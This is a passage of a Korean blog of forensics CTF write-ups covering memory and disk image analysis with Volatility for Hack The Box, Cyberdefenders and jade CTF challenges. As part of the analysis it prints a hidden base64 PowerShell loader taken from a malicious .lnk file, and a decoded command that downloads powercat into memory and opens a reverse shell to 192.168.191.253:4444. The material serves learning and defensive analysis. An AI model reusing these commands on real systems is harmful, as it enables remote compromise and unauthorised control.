비전공자의 포렌식일기

[Hack The Box] Reminiscent

Ron Weasley — Sat, 7 Jan 2023 00:20:30 +0900

새해에 앞서 CTF 실력이...많이 좋지 않은걸 깨닫고 나름 퀄리티 좀 있는 사이트인 Hack The Box에서 기본적으로 제공해주는 문제를 풀어보기로 결심했다...이 문제를 시작으로 포렌식 문제를 모두 풀어볼 것 이다.

문제를 보겠습니다.

Suspicious traffic was detected from a recruiter's virtual PC.
A memory dump of the offending VM was captured before it was removed from the network for imaging and analysis.
Our recruiter mentioned he received an email from someone regarding their resume.
A copy of the email was recovered and is provided for reference.
Find and decode the source of the malware to find the flag.

해석을 좀 해보면, 채용 담당자의 가상 PC에서 의심스러운 트래픽이 탐지가 되었고, 문제가 있는 가상 PC의 메모리 덤프가 이미징 분석을 위해 네트워크에서 제거되기 전 캡처가 되었다고 한다. 채용 담당자랑 인터뷰를 한 결과 누군가로부터 이력서와 관련된 이메일을 받았고, 이메일 사본을 가지고 추측하여 멀웨어의 소스를 찾는 문제이다.

주어진 파일을 보면 다음과 같다.

elf 파일, txt 파일, eml 파일 총 3개로 구성이 되는데 일단 메모리 포렌식을 이용해야 되기 때문에 imageinfo.txt에 프로파일이 적혀있고, eml 파일을 보면 대화 내용을 볼 수 있다.

일단, 이것을 보면 보낸 사람은 Brian Loodworm이고 받는 사람은 flounder라는 사람이다.

바로 분석을 시작하도록 하겠다. 사용할 도구는 volatility로 메모리 포렌식 분석을 위해 만들어진 도구이다.

문제 키워드에서 수상한 이메일이라고 했으니 이메일과 관련된 프로세스가 있는지 봐야한다.

volatility_2.6_win64_standalone.exe -f .\flounder-pc-memdump.elf --profile=Win7SP1x64 pstree

explorer.exe 프로세스의 자식 프로세스 중, Thunderbird라는 모질라 기반으로 만들어진 이메일 프로그램이 존재한다.

이 프로그램을 메모리 덤프떠서 사본으로 준 이메일 파일에 있던 송, 수신자를 검색해보도록 하겠다.

volatility_2.6_win64_standalone.exe -f .\flounder-pc-memdump.elf --profile=Win7SP1x64 memdump -p 2812 -D ./

메모리 덤프를 떳으면, 바로 strings로 문자열화 시켜줍니다. 그 이유는 덤프를 바로 뜨게되면 쓰레기 값들이 같이 떠지기 때문에 쓰레기 값들을 지우려고 strings를 사용하는 것입니다.

이제 strings화 된 파일을 노트패드로 열고 찾은 이메일들을 검색을 해보면, 이 이메일 프로그램으로 메일을 주고 받았다는 것을 확신할 수 있습니다.

다음은 resume.zip 파일이 이메일 안에 첨부가 되어 있었는데 가상 PC를 메모리 덤프를 뜰 시점에 저 파일이 있다면 분명히 주소 어딘가에 남아있을거라는 생각에 filescan 명령어로 찾아봤습니다.

volatility_2.6_win64_standalone.exe -f .\flounder-pc-memdump.elf --profile=Win7SP1x64 filescan | findstr "resume"

이 명령어를 수행하면, 2개의 파일이 나옵니다.

resume.pdf.lnk 파일이 있다는것은 바로가기 파일이며 문제에서 이력서를 받았다고 했습니다.

링크 파일은 바탕화면이나 시작 메뉴 등에 주로 쓰는 프로그램을 놓을 때 원본 위치를 가리키는데, 최근에는 바이러스 유포 등에 악용되고 있는 사례중 하나가 다운로드한 파일에 링크파일이 있다면 감염이 된다는 것입니다.

보통...이런 경우에는 스크립트를 이용한 악성코드일 가능성이 높기 때문에 멀웨어 소스를 찾는거 보니 스크립트 코드로 되어 있을 것 같다는 추측입니다.

일단 저 파일을 추출해봅시다.

volatility_2.6_win64_standalone.exe -f .\flounder-pc-memdump.elf --profile=Win7SP1x64 dumpfiles -Q 0x000000001e8feb70 -D ./

추출을 하게 되면, 파일이 하나 떨궈집니다. 떨궈진 파일을 hxd 로 열어보면 windows powershell과 같은 데이터들이 남아 있는것을 볼 수 있습니다.

조금 더 내려보시면, 파워쉘 스크립트가 나오는데 조금만 가져오겠습니다.

Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('JHN0UCwkc2lQPTMyMzAsOTY3NjskZj0ncmVzdW1lLnBkZi5sbmsnO2lmKC1ub3QoVGVzdC1QYXRoICRmKSl7JHg9R2V0LUNoaWxkSXRlbSAtUGF0aCAkZW52OnRlbXAgLUlciAkZiAtUmVjdXJzZTtbSU8uRGlyZWN0b3J5XTo6U2V0QmVudERpcmVjdG9yeSgkeC5EaXJlY3RvcnlOYW1lKTt9JGxuaz1OZXctT2JqZWN0IElPLkTdHJlYW0gJGYsJ09wZW4nLCdSZVhZFdyaXRlJzskYjY0PU5ldy1PYmplY3QgYnl0ZVtdKCRzaVApOyRsbmsuU2Vlac3RQLFtJTy5TZWVrT3JpZ2luXTo6QmVnaW4pOyRsbmsuUmVhZCgkYjY0LDAsJHNpUCk7JGI2ND1bQ29udmVydF06OkZyb21CYXNlNjRDaGFyQXJyYXkoJGI2NCwwLCRiNjQuTGVuZ3RoKTskc2NCPVtUZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGI2NCk7aWV4ICRzY0I7')); iex $r;

뭐 이런느낌인데...text를 base64로 인코딩된 문자열을 파라미터로 받겠다. 그래서 방금 추출했던 파일을 좀 살펴보다보면 인코딩 된 문자열들을 볼 수 있습니다.

끝까지 추출해서 디코딩하면 flag 값을 볼 수 있습니다.

결국엔, 파워쉘 스크립트를 좀 해석하면 위에 저 스크립트 코드를 base64로 받는다고 했으니까 base64로 인코딩 한 문자열을 파라미터로 준 것입니다.

역시...핵더박스 문제 퀄리티 좋네요 ㅋㅋㅋㅋ

[Cyberdefenders] MR.Gamer

Ron Weasley — Mon, 2 Jan 2023 15:40:06 +0900

최근 Cyberdefenders 사이트의 포렌식 문제를 하나씩 접하는 중이여서 write-up을 작성해보려고 합니다.

문제 파일을 다운 받으면, E01로 된 디스크 이미징 파일이 주어지고 이 파일은 분할이 되어 있기 때문에 파일 1개라도 옮길 경우 분석이 불가능하다. 그리고 리눅스 포렌식이기 때문에 설명이 정확하지 않을 수 있다는 점 참고 바랍니다.

시나리오를 보겠습니다.

[시나리오]
This #Linux image belongs to a user who likes to play games and communicate with friends.
Is there something happening under the hood?
Test drive your #LinuxForensics skills and identify anomalies!

해석을 해보면, 게임을 하고 친구들과 소통하는 것을 좋아하는 사용자의 시스템을 이미징화 하였고 리눅스 포렌식 기술을 사용하여 분석을 요청하는 문제입니다. 바로 풀이를 하겠습니다.

[문제 1]

I use print statements for my logging ->
What is the name of the utility/library the user was looking at exploits for?

문제를 해석해보면, exploits에 사용한 유틸리티 또는 라이브러리를 물어보는 문제입니다.

쉽게 말해서 익스플로잇은 한글로 취약점 공격이고, 취약점 공격이란 컴퓨터의 소프트웨어나 하드웨어 및 컴퓨터 관련 전자 제품의 버그, 보안 취약점 등 설계상 결함을 이용해 공격자의 의도된 동작을 수행하도록 만들어진 절차나 일면의 명령, 스크립트, 프로그램 또는 특정한 데이터 조각을 의미합니다.

일단, 명령어 히스토리를 먼저 보겠습니다.

Path : root\home\rafael\.bash_history

히스토리를 살펴보면, Log4j 라는 자바 기반 로깅 유틸리티를 에디터로 열어본 흔적을 찾을 수 있었습니다.

그래서 일단 exploits에 사용된 유틸리티가 Log4j 라는 것은 확인이 되었으니, 답을 입력하시면 됩니다.

하지만, 히스토리만 보면 답만 맞춘 것이기 때문에 조금 더 고민을 해보면 파일 시스템 내에 log4j와 관련된 흔적을 많이 찾을 수 있습니다.

Path : root\home\rafael\apache-log4j-rce-poc

해당 경로에서도 log4j 라는 키워드가 존재하고, 웹 히스토리를 봐도 CVE가 나오기 때문에 log4j 인 것을 확인할 수 있었습니다.

웹 히스토리 파일이 있는 경로는 다음과 같습니다.

Path : root\home\rafael\snap\firefox\common\.mozila\firefox\mcrcm1xn.default\places.sqlite

웹 히스토리 로그에서는 CVE-2021-44228 Log4j 라는 것을 볼 수 있었습니다.

이외에도 사용자의 사진 디렉터리에 스크린샷을 보면 Log4j와 관련된 사진들도 볼 수 있었고, 이 모든 정황으로 볼 때 exploits에 사용된 유틸리티는 Log4j임을 확신할 수 있었습니다.

[문제 2]

Mischievous Lemur ->
What is the version ID number of the operating system on the machine?

설치된 운영체제의 버전을 물어보는 문제입니다.

리눅스에서는 운영체제의 버전은 다음과 같은 경로에 저장되어 있습니다.

Path : root\etc\issue

설치된 운영체제의 버전은 Ubuntu 21.10 버전입니다.

[문제 3]

$whoami ->
What is the hostname of the computer?

컴퓨터의 hostname이 누구인지 물어보는 문제입니다.

리눅스에서 hostname은 다음과 같은 경로에 저장되어 있습니다.

Path : root\etc\hostname

해당 컴퓨터를 사용하고 있는 hostname은 rshell-lenovo입니다.

[문제 4]

A little blue birdie told me ->
What is one anime that the user likes?

작은 파란새가 말을 하고 있으며 사용자가 가장 좋아하는 애니메이션이 무엇인지 물어보는 문제입니다.

키워드를 보시면 "작은 파란 새" 라고 되어있는데, 문제 파일에서 볼 수 있는 파란새는 썬더버드와 트위터입니다. 하지만, 지문 자체를 봤을 때 썬더버드는 디렉터리가 존재하기 때문에 연상이 되지만 트위터를 연상할 수 없기 때문에 제가 찾은 방법을 소개해드릴려고 합니다.

먼저, 웹 히스토리를 봤습니다.

웹 히스토리 상에 남아있는 트위터들을 이동해보면, NASCAR라는 스포츠협회 계정을 탐방하는 것으로 보이고 트윗을 업데이트를 계속 진행하는 것으로 보아 애니메이션으로 볼 수 없는 것들만 나와있음을 알 수 있었다. 하지만 웹 브라우저 로그들은 삭제가 가능하기 때문에 확정을 지을 순 없는 부분이다.

그럼 나머지 키워드인 썬더버드를 한번 보겠습니다.

썬더버드는 모질라에서 개발한 이메일 소프트웨어로 다양한 정보들이 담겨 있습니다.

Path : root\home\rafael\.thunderbird\vrvcx2qf.default-release\global-messages-db.sqlite

제가 문제 해결에 이용한 파일은 공식문서를 통해 보니 thunderbird를 통해서 주고 받은 메시지를 검색할 수 있게 해주는 인덱싱 시스템 파일입니다.

sqlite로 되어 있기 때문에 DB Browser for sqlite를 이용해서 파일을 열어주면 다양한 메일의 내용을 볼 수 있습니다. (와이파이 비밀번호도 담겨있음)

빨간색 체크 박스로 된 메일의 내용을 살펴보시면, 트위터로 연결되는 여러개의 링크가 있습니다.

그 중 일부를 한번 보겠습니다.

일부를 보시면, Attack on Titan 계정과 연결된 링크를 하나 줍니다.

링크를 따라 들어가시면 사용자가 좋아하는 애니메이션을 확인 할 수 있었습니다.

진격의 거인입니다!!!! 그래서 영어로 번역을 하면 Attack on titan이 사용자가 즐겨하는 애니메이션임을 확인할 수 있습니다.

이외에도 확인을 할 수 있는 방법이 있긴 하지만 조금 까다롭기 때문에 경로만 설명을 좀 하고 넘어가도록 하겠습니다.

Path : root\home\rafael\.thunderbird\vrvcx2qf.default.release\ImapMail\imap.gmail.com\INBOX

이 경로에 위치한 INBOX 파일은 thunderbird 메일을 이용하여 받은 메일을 저장하는 폴더입니다.

Gmail로 따지면 "받은 편지 보관함" 같은 기능을 하는 파일로 thunderbird에서 사용하던 메일 서버를 변경했을 때, 과거에 메일을 주고 받았던 기록들이 INBOX 파일에 저장이 되어 있어 백업 기능도 할 수 있게 하는 파일이기 때문에 Attack on titan 메일을 받은 로그들이 남아 있었습니다.

하지만, 문제를 풀다보니 "작은 파란 새" 라는 것이 썬더버드와 트위터 둘다 의미를 하는 것 이였으며 썬더버드를 통해 받은 트위터 URL링크를 가지고 해결하는 문제이므로 색다른 문제였던 것으로 생각합니다.

[문제 5]

Into the Matrix, we go ->
What is the UUID for the attacker's Minecraft account?

공격자가 사용한 마인크래프트의 UUID를 물어보는 문제입니다.

마인크래프트 UUID를 확인하는 방법은 여러가지가 있지만, 쉽게 usercahce.json을 확인하는 것 입니다.

Path : root\home\rafael\.minecraft\usercache.json

usercache.json 파일을 보면 유저의 이름, uuid 등등 다양한 정보들을 확인 할 수 있습니다.

이외에도 다음 경로에서 동일한 uuid를 확인할 수 있었습니다.

Path : root\home\rafael\.minecraft\saves\1_1_8 world\playerdata

이 디렉터리는 마인크래프트를 해보시면 아시겠지만 마인크래프트는 새로운 계정이 아니라 새로운 월드로 생성이 됩니다.

그렇기 때문에 1.1.8 월드에 대한 플레이어 데이터를 보시면 [uuid].dat 파일이 생성된 것을 볼 수 있는데, uuid랑 비교했을 때 동일한 아이디 임을 확인할 수 있었습니다.

[문제 6]

Today's Youtube video is sponsored by... ->
What VPN client did the user install and use on the machine?

사용자가 시스템에 설치하고 사용한 VPN Client를 물어보는 문제입니다.

VPN이란 Virtual Private Network의 약자로 공중 네트워크를 통해 한 회사나 몇몇 단체가 내용을 외부로 드러내지 않고 통신할 목적으로 쓰이는 사설 통신망입니다.

문제를 처음 접하고, 다양한 디렉터리를 봤을 때 openVPN이 있어서 입력을 했지만 틀렸습니다. 이유를 말씀드리자면 \etc\openvpn\ 경로에 가시면 아무런 파일들도 남아 있지 않았기 때문에 거짓 정보라는 것을 유추할 수 있었습니다.

일단, vpn을 설치를 했다면 터미널을 통해서 입력을 했음을 알 수 있으니까 히스토리를 한번 보겠습니다.

Path : root\home\rafael\.bash_history

히스토리를 보시면 curl 명령어를 가지고 zerotier를 다운 받는것을 볼 수 있습니다.

zerotier는 가상 소프트웨어 네트워크를 만들고 관리하는 회사이기 때문에 VPN을 제공하는 업체라고 생각을 하시면 될 것 같습니다.

더 나아가서 스크린 샷으로 촬영된 사진들을 살펴 본 결과 zerotier를 사용하는 것을 볼 수 있습니다.

Path : root\home\rafael\Pictures\Screenshot from 2022-02-08 22-41-44.png

[문제 7]

Be our guest ->
What was the user's first password for the guest wifi?

게스트 와이파이를 위한 사용자의 첫 번째 비밀번호를 물어보는 문제입니다.

눈치를 채셨을 지 모르겠지만, 아까 위에서 thunderbird 메일을 다룰 때 와이파이 비밀번호도 적혀있었다. 라고 조그만하게 써놨었습니다.

아까 추출을 했던 global-message-db를 열어보면 3개의 와이파이 비밀번호를 알 수 있었습니다.

이 중 가장 먼저 공개된 패스워드를 보면 2022년 1월 28일에 발행된 093483 패스워드 비밀번호 입니다.

[문제 8]

If a picture is worth a thousand words, how many is a video worth? ->
The user watched a video that premiered on Dec 11th, 2021.
How many views did it have when they watched it on February 9th?

사용자는 2021년 12월 11일에 비디오 영상을 봤고, 2월 9일에 동일한 영상을 봤을 때 조회수를 물어보는 문제입니다.

조회수가 있다는건 Youtube를 통해서 들어갔다는 것이지만 웹 히스토리를 통해 유튜브를 들어갔다고 가정하면 2023년으로 잡히기 때문에 조회수가 맞질 않고, 좀 전에 스크린샷이 저장된 Picture 디렉터리에서 유튜브 영상이 촬영된 것을 볼 수 있었습니다.

Path : root\home\rafael\Pictures\Screenshot from 2022-02-09 16-42-10.png
Path : root\home\rafael\Pictures\Screenshot from 2022-02-09 17-31-17.png
Path : root\home\rafael\Pictures\Screenshot from 2022-02-09 17-42-23.png

이 3개의 사진 파일을 보면 가장 먼저 16시 42분 10초에 촬영된 사진을 보면 265.342뷰를 기록하고 있지만 나머지들은 더 많은 조회수를 가지고 있기 때문에 문제 출제 의도에 따라서 265342가 조회수입니다.

[문제 9]

I'm hungry for videos ->
What is the new channel name for the YouTuber whose cookbook is shown on the device?

요리책을 쓴 유튜버의 채널을 물어보는 문제입니다. 개인적인 생각이지만 문제 설명이 정말 안좋습니다...

Path : root\home\rafael\marshalsec

home 디렉터리안에 marshalsec 디렉터리가 하나 존재하는 것을 볼 수 있는데 구글을 통해서 살펴보니 Log4j에 대한 CVE-2021-44228에 대한 정보들이 담겨있는 github 사이트가 있었습니다.

marshalsec 디렉터리를 본 결과 Log4j 테스트를 하기 위해서 다양한 소스코드들과 사진 등 엄청 많은 파일들이 있었고, 그 중 특정한 png 파일을 살펴보니 요리책이 하나 있었습니다.

책 제목을 구글에 입력하니 유튜브 채널이 하나 나오게 되었고, 유튜버의 이름은 Babish Culinary Universe입니다.

[문제 10]

Hunt the Wumpus ->
What is the module with the highest installed version for the chat application with the mascot Wumpus?

채팅 어플리케이션의 모듈 버전을 물어보는 문제입니다.

home 디렉터리에 숨겨진 디렉터리인 .config 디렉터리가 있습니다. 안에 존재하는 디렉터리들을 살펴보면 discord 채팅 앱이 설치된 것을 볼 수 있다.

Path : root\home\rafael\.config\discord\0.0.16\modules\installed.json

installed.json 파일을 살펴보면 다음과 같은 로그들을 볼 수 있었습니다.

가장 최신 버전을 보면 5로 되어있는 discord_voice가 최신 버전임을 알 수 있었습니다.

[문제 11]

It's raining ocelots and wolves ->
According to Windows,
what was the temperature in Fahrenheit on February 11th, 2022, at 6:30 PM?

윈도우에 저장된 화씨의 온도를 찾는 문제입니다. 정말 문제가 이상하군요...

아까 요리책을 찾는 방법과 같은 방법으로 풀었지만 다른 방법으로도 푸는 방법을 설명하도록 하겠습니다.

Path : root\home\rafael\.cache\thumbnails\normal

이 경로를 가시면 다양한 사진에 대한 썸네일 파일들이 존재합니다. 썸네일은 말 그대로 사진이 하나 있다면 그 사진을 축소해서 조그맣게 미리 보여주는 기능을 하는 것입니다. 그렇기 때문에 디렉터리에 1.png 파일이 있다면 1.png 파일에 대한 썸네일 파일도 하나 존재합니다.

그래서 윈도우 화면으로 미리 보기 기능을 제공하는 png 파일들이 여러개 있지만 그 중 bd04fc8 ~~~로 된 파일이 우리가 찾는 파일입니다.

썸네일 파일을 추출해서 hxd 값으로 열어보면 썸네일 파일을 생성하게 하는 원본 파일의 경로를 제공합니다.

그래서 YXvy~~ 파일을 marahalsec 디렉터리에서 보게 되면 원본 사진을 볼 수 있습니다.

6시 30분에 스크린 샷이 찍혔고 화씨 45F 임을 알 수 있었습니다.

[문제 12]

Never gonna give... up on this question ->
What is the upload date of the second youtube video on the channel from which the user downloaded a youtube video?

유튜브 영상을 하나 다운로드 하였고, 이 영상을 다운 받을 때 들어갔던 유튜버의 2번째로 업로드된 날짜를 물어보는 문제입니다. (오신트인가..)

Path : root\home\rafael\Downloads\

경로에 가시면, Rick Astley - Never Gonna Give you up 음악 파일이 다운로드 되어 있는것을 확인할 수 있었습니다.

저 노래는 다들 들어보셨을 노래이기 때문에, Rick Astley가 유튜브 채널을 개설했다는 것으로 알면 되겠네요.

빨간색 체크 박스로 된 영상이 두번째로 업로드 된 영상입니다. 날짜를 보시면 될 것 같네요.

2009년 10월 25일에 업로드 된 것을 볼 수 있습니다.

[문제 13]

Buzzy Bees ->
What is the SHA-1 hash of Minecraft's "latest" release according to the system?

마인크래프트의 최신 릴리스 SHA-1 해시값을 물어보는 문제입니다.

Path : root\home\rafael\.minecraft\versions\version_manifest_v2.json

json 파일을 살펴보면 최신 릴리즈의 SHA-1 해시값을 알 수 있습니다.

[문제 14]

The RCE is base(64)d on what? ->
What were the three flags and their values that were passed to powercat?
The answer must be provided in the same format as the entered command.
(For example, if the command was "powercat -D Y -l a -n," the answer would be "-D Y -l a -n")

base64로 인코딩 된 powercat의 명령을 알아오라는 문제입니다.

다시 히스토리를 보겠습니다.

powercat에 대한 로그들을 확인했습니다.

또 다른 히스토리를 살펴보면, Log4jRCE.java 파일을 수정하는 것을 볼 수 있었고, marshalsec/poc/ 경로로 파일을 복사한 것을 볼 수 있습니다.

그래서 경로를 따라서 Log4jRCE.java 를 에디터로 열어보면 다음과 같은 클래스가 적혀있습니다.

사실 이 값만 보고는 어떤 것을 하는 행위 스크립트인지는 알 수 없으나, 해석을 좀 해보면 다음과 같습니다.

자바에서 Runtime.getRuntime().exec("시스템 명령어"); 는 시스템 명령어를 실행하고 그 결과를 받아서 화면에 표시한다.
그래서 powershell 프로그램을 실행하고, -exec bypass 옵션을 줌으로써 파워쉘 스크립트 실행을 제한하는
Restricted 실행 정책을 무시한 후, -enc 옵션으로 인코딩된 메개변수를 명령 줄로 전달받아서 실행한다.

결국, base64로 인코딩된 매개변수를 실행한다라고 해석을 하시면 될 것 같습니다.

디코딩을 하면 다음과 같은 명령어를 볼 수 있습니다.

불필요한 .을 없애도록 하겠습니다. 없애고 해석도 같이 했습니다.

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.191.253:8000/powercatps1');
powercat -c 192.168.191.253 -p 4444 -e cmd"

해석 : 파워쉘에서 커맨드로 입력을 받고, Ivoke-Expression을 사용하여 실제 시스템에 떨어지는 파일 없이 메모리 상으로 다운로드 받아서 바로 실행을 한다.
다운로드 URL은 http://192.168.191.253/8000/에서 powercat.ps1 파일을 다운로드 받는다.
메모리 상에서 다운로드 받는 것이기 때문에 바로 powercat 실행시킬 수 있다.
powercat은 netcat의 파워쉘 버전이며 사용자가 입력한 명령어는 다음과 같다.
powercat -c 192.168.191.253 -p 4444 -e cmd는 192.169.191.253 포트 4444에 연결해서 cmd를 실행해라.

쉽게 해석을 작성한 것 같은데...아마 되었겠죠?? ㅎㅎㅎ 그래서 결국엔 문제 풀이에 사용하는 것은

-c 192.168.191.253 -p 4444 -e cmd 겠네요!!

[문제 15]

Hello (New) World ->
How many dimensions (including the overworld) did the player travel to in the "oldest of the worlds"?

마인크래프트 플레이어가 새로운 월드로 이동을 했는데, 몇 개의 월드로 이동했냐 물어보는 문제입니다.

Path : root\home\rafael\.minecraft\saves\

해당 경로로 가시면 아까 처음엔, 1.1.8 월드를 이용해서 사용자의 UUID를 파악했습니다.

남은 파일은 New World를 보시면 DIM1, DIM-1 등등 많이 있는데, playerdata를 보시면 같은 사용자의 UUID를 가진 파일이 .old냐, .dat이냐 2개가 존재합니다. 원래라면 DIM1, DIM-1 등등 많이 이동을 했을 것 이지만 DIM1, DIM-1 디렉터리 안에는 정보들이 남아 있지 않았기 때문에 결국엔 1번만 이동을 한 것으로 보입니다.

[문제 16]

Matrix_1999 is the key! ->
What is the mojangClientToken stored in the Keystore?

mojangClientToken을 찾는 문제입니다.이 문제는 직접 풀지는 못하여서 롸업을 참고를 좀 하였고 풀이 방법은 다음과 같습니다.

풀이 방법은 E01 파일을 qemu를 통해서 vmdk 파일로 만들어 준 후, 마운트하여 직접 운영체제를 분석하는 방법입니다.

가상 머신에 이미지 파일을 마운트해주면 다음과 같은 tokenKey를 볼 수 있었습니다.

직접 실습을 하기 위해서 도전을 했으나 컴퓨터 용량 부족 문제 때문에 풀 수 없었기 때문에 다음에 기회가 된다면 풀어보도록 하겠습니다.

이렇게 Cyberdefenders 문제를 다 풀어봤는데, 솔직히 많이 배웠지만 지문들을 이해하는데 너무 오랜 시간이 걸려서 힘들었습니다 ㅠㅠㅠ

-Reference-https://cyberforblue.com/cyberdefenders-mr-gamer-writeup/https://whitesnake1004.tistory.com/477

jade CTF 2022

Ron Weasley — Mon, 24 Oct 2022 04:34:45 +0900

10월 23일 참가한 jade CTF에서 DFIR 카테고리의 문제들을 풀어봤는데, 새로운 유형을 본 것 같아 풀이를 작성하려고 한다.

[LM 10]

문제를 보겠습니다.

네트워크 패킷을 분석하여 플래그를 찾는 문제이다.

패킷을 열어, HTTP object list를 열어보니 flag.txt가 보이길래 해당 패킷에 가서 데이터를 봤습니다.

URL이 하나 존재하며, 링크를 타고 들어가보니까 노래가 하나 나옵니다.

flag.txt는 가짜인 것으로 판별이 나서 jpg 파일들을 하나씩 카빙을 진행하였고, 사진속에 플래그 값이 있는 것을 확인할 수 있었다.

[Auto CAD]

문제를 보겠습니다.

문제를 해석해보면, 이벤트에 대한 포스터를 디자인하는 작업이 주어졌습니다. 디자인 도중, 당신은 잠시 휴식을 취했고, 돌아왔을 때, 누군가가 당신의 작품을 더럽힌 것을 보았습니다. 주최자가 알기 전에 빨리 고쳐야 된다고 합니다.

문제 파일을 실행시키면, 파일이 손상된 것을 확인할 수 있습니다.

hxd 에디터로 열어보니 IHDR 청크 부분에서 높이 넓이의 값이 00으로 채워져있는 것을 볼 수 있습니다.

그래서 다음과 같은 코드로 복원을 시켜주도록 합시다.

from zlib import crc32

data = open("poster.png",'rb').read()
index = 12 # IHDR chunk가 시작되는 인덱스

ihdr = bytearray(data[index:index+17]) # IHDR 시작부터 CRC 전까지의 범위
width_index = 7 # width 부분의 세 번째 바이트 인덱스
height_index = 11 # height 부분의 세 번째 바이트 인덱스

for x in range(1,2000):
	height = bytearray(x.to_bytes(2,'big'))
	for y in range(1,2000):
		width = bytearray(y.to_bytes(2,'big'))
		for i in range(len(height)):
			ihdr[height_index - i] = height[-i -1]
		for i in range(len(width)):
			ihdr[width_index - i] = width[-i -1]
		if hex(crc32(ihdr)) == '0x1763adc8': # CRC값
			print("width: {} height: {}".format(width.hex(),height.hex()))
	for i in range(len(width)):
			ihdr[width_index - i] = bytearray(b'\x00')[0]

코드를 돌린 값으로 고쳐주면 플래그 값을 찾을 수 있다.

근데..잘 안보이기 때문에 stegsolve로 이미지를 돌려보니 제대로 된 플래그를 찾을 수 있었다.

[Call Sandeep]

문제를 보겠습니다.

문제를 살펴보면, Pearl은 생일 파티를 열려고 하는데 Sandeep은 연락이 되지 않아 Jade를 불러서 Sandeep과 연락할 수 있게 도와달라고 한다.

그래서 Jade는 Pearl에게 메일을 보냈는데 Pearl의 PC가 고장난 상태이다. 그래서 정보들을 불러올 수 없으니 포렌식 분석을 부탁하는 시나리오이다.

링크를 통해서 파일을 다운받으면 메모리 덤프 파일이 하나 주어지기 때문에 volatility로 분석을 진행하였다.

먼저, 이미지 파일의 운영체제(프로파일)를 알기 위해서 imageinfo 플러그인을 사용하여 확인했다.

volatility_2.6_win64_standalone.exe -f sandeep.raw imageinfo

문제에서 봤다시피 메일을 보낸 것이니까 pslist를 통해서 덤프를 떴을 당시 실행되고 있던 프로세스들을 추출하였다.

volatility_2.6_win64_standalone.exe -f sandeep.raw --profile=Win7SP1x64 pslist

추출한 결과, thunderbird라는 이메일 프로그램이 하나 존재했고 pstree로 부모 프로세스를 확인하였다.

volatility_2.6_win64_standalone.exe -f sandeep.raw --profile=Win7SP1x64 pstree

thunderbird 프로세스 3개중 부모 프로세스가 3888로 된 프로세스라서 memdump를 통해서 3888 프로세스를 덤프떴다.

덤프를 뜨게 되면, 3888.dmp 파일이 하나 생성되는 것을 볼 수 있다.

volatility_2.6_win64_standalone.exe -f sandeep.raw --profile=Win7SP1x64 memdump -p 3888 -D ./

해당 파일을 분석하기 쉽게 strings 프로그램으로 문자열화 하여 분석을 진행했다.

strings.exe 3888.dmp > 3888.log

로그 파일이 생성 되었으면 notepad++ 로 파일을 열어봤는데, 엄청 많은 로그가 있어서 분석하기 쉽지 않았다.

문제를 보면 키워드를 하나 알 수 있는건 Jade, Pearl, mail, sandeep 의 키워드가 존재한다.

jade라는 키워드로 검색을 해본 결과, 이메일의 흔적을 볼 수 있었다. 하지만 중간에 조금 잘린 메일이기 때문에 원본 메일은 발견하지 못하였다.

원본 메일을 찾기 위해서 구글링을 하였고, 썬더버드는 메일의 내용을 Sent 파일에 저장을 하고 있다는 것을 알았고, Sent 파일을 검색 해보았다.

 volatility_2.6_win64_standalone.exe -f sandeep.raw --profile=Win7SP1x64 filescan | findstr "Sent"

volatility_2.6_win64_standalone.exe -f sandeep.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000007dec85f0 -D ./

Thunderbird 경로에 Sent 파일이 하나 있는것을 확인할 수 있다. 바로 추출을 하고 메모장으로 열어보니 원본 메일을 볼 수 있었다.

진짜 수상하게 base64로 인코딩 된 친구가 하나 있는 것을 볼 수 있다. 디코딩을 진행해보니 "5b2b7f05237305611f3368214d3a601d4325740f" 이런 값이 나왔고, Sent 파일을 더 분석해보면 C언어로 된 XOR 연산코드를 하나 볼 수 있다.

결국엔 디코딩해서 나온 값을 char flag[]에 넣어주라는 것으로 보여 값을 넣어주고 프로그램을 실행시켜봤다.

코드를 볼려보니 이상한 값이 나오길래 파이썬 코드로 다시 돌려보니 정상적으로 나오는 것을 확인할 수 있었다.

st = [0x5b,0x2b,0x7f,0x05,0x23,0x73,0x05,0x61,0x1f,0x33,0x68,
0x21,0x4d,0x3a,0x60,0x1d,0x43,0x25,0x74,0x0f]

def decode(encrypted_message):
    flag = ""
    for i, char in enumerate(encrypted_message):
        
        for j in range(256):
            byte = j
            if (i > 0):
                byte ^= encrypted_message[i-1]
            
            byte = byte ^ (byte >> 4)
            byte = byte ^ (byte >> 3)
            byte = byte ^ (byte >> 2)
            byte = byte ^ (byte >> 1)
            
            if byte == char:
                flag += chr(j)
                                
    print(flag)

decode(st)

하지만...jctf{} 형식이기 때문에 뒤에 부분을 찾은 것으로 확인이 되어 다른 로그들을 살펴봤다.

jade가 방문한 URL 정보이다. url을 따라가보면 reddit을 검색하고 pas를 검색하고 했던 정보들을 저장하고 있었다.

조금씩 로그들을 더 분석해보니까 jade의 컴퓨터 내부에 png파일, jpg파일, pdf들이 존재하는 것을 볼 수 있다.

파일들의 이름이 sandeep으로 된 것으로 보아 sandeep과 관련된 파일임을 알고, 추출을 진행했다.

volatility_2.6_win64_standalone.exe -f sandeep.raw --profile=Win7SP1x64 filescan | findstr "png"

Part-1.png라는 파일만 출력 된 것을 볼 수 있다. 메모리 주소를 알았으니 파일을 덤프를 떠보았다.

volatility_2.6_win64_standalone.exe -f sandeep.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000007ed6c9c0 -D ./

추출을 했는데 우리는 png 파일을 추출했기 때문에 png로 확장자를 바꿔주고 파일을 열어봤으나 열리지 않았다.

그래서 hxd에디터로 열어보니 시그니처랑 청크가 살짝 손상이 된 것을 볼 수 있었다.

정상적인 시그니처로 고쳐주고 파일을 열어보니 첫번째 플래그를 찾을 수 있었다.

그래서 두 개를 조합해보면, jctf{p34rl_1s_ybbx1at_s0e_Fnaqrrc}가 된다.

그러나 에러가 뜨기 때문에, 뭔가 뒤에 나오는 플래그 값에 문제가 있음을 직감하고 어떤 문자로 인코딩 된지 찾다가 ROT13으로 인코딩 됨을 알 수 있었다

ROT13으로 디코딩 시켜주면 look1ng_f0r_Sandeep} 이 값이 나오고 정상적으로 플래그를 찾았다.

FLAG : jctf{p34rl_1s_look1ng_f0r_Sandeep}

[La Tour]

